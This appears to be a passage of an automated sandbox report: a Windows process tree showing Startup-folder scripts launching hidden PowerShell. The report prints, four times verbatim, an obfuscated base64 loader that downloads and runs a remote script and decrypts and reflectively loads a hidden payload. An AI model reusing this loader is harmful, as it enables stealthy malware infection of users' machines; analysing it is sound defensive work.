aXRoKCc6OicpKQl7CQkkcGV6eXA9JGhrbC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZ2NvdXI9W3N0cmluZ1tdXSRwZXp5cC5TcGxpdCgnXCcpO0lFWCAnJGJldHJwPW9mZXRhIChwdGprcyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRnY291clswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRzYnZzaz1vZmV0YSAocHRqa3MgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZ2NvdXJbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7bGh5eHEgJGJldHJwICRudWxsO2xoeXhxICRzYnZzayAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | IEX" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 8152 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_afc64e18.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1276 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_afc64e18.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1784 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRvZWVvdj0keHVwenouQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2Vlb3YuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRra2MgPSAkZW52OlVTRVJOQU1FOyR3bmp3ZiA9ICdDOlxVc2Vyc1wnICsgJGtrYyArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHduandmOyR1bXFvaj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHduandmKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkaGtsIGluICR1bXFvaikgewlpZiAoJGhrbC5TdGFydHNXaXRoKCc6OicpKQl7CQkkcGV6eXA9JGhrbC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZ2NvdXI9W3N0cmluZ1tdXSRwZXp5cC5TcGxpdCgnXCcpO0lFWCAnJGJldHJwPW9mZXRhIChwdGprcyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRnY291clswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRzYnZzaz1vZmV0YSAocHRqa3MgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZ2NvdXJbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7bGh5eHEgJGJldHJwICRudWxsO2xoeXhxICRzYnZzayAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | IEX" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 7468 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_30ab010e.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6108 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_30ab010e.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1476 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRvZWVvdj0keHVwenouQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2Vlb3YuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRra2MgPSAkZW52OlVTRVJOQU1FOyR3bmp3ZiA9ICdDOlxVc2Vyc1wnICsgJGtrYyArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHduandmOyR1bXFvaj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHduandmKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkaGtsIGluICR1bXFvaikgewlpZiAoJGhrbC5TdGFydHNXaXRoKCc6OicpKQl7CQkkcGV6eXA9JGhrbC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZ2NvdXI9W3N0cmluZ1tdXSRwZXp5cC5TcGxpdCgnXCcpO0lFWCAnJGJldHJwPW9mZXRhIChwdGprcyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRnY291clswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRzYnZzaz1vZmV0YSAocHRqa3MgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZ2NvdXJbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7bGh5eHEgJGJldHJwICRudWxsO2xoeXhxICRzYnZzayAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | IEX" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 7496 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a3290096.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1096 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a3290096.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1720 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRvZWVvdj0keHVwenouQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2Vlb3YuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRra2MgPSAkZW52OlVTRVJOQU1FOyR3bmp3ZiA9ICdDOlxVc2Vyc1wnICsgJGtrYyArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHduandmOyR1bXFvaj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHduandmKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkaGtsIGluICR1bXFvaikgewlpZiAoJGhrbC5TdGFydHNXaXRoKCc6OicpKQl7CQkkcGV6eXA9JGhrbC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZ2NvdXI9W3N0cmluZ1tdXSRwZXp5cC5TcGxpdCgnXCcpO0lFWCAnJGJldHJwPW9mZXRhIChwdGprcyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRnY291clswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRzYnZzaz1vZmV0YSAocHRqa3MgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZ2NvdXJbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7bGh5eHEgJGJldHJwICRudWxsO2xoeXhxICRzYnZzayAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | IEX" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 4912 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5e045579.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8012 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5e045579.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7980 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHd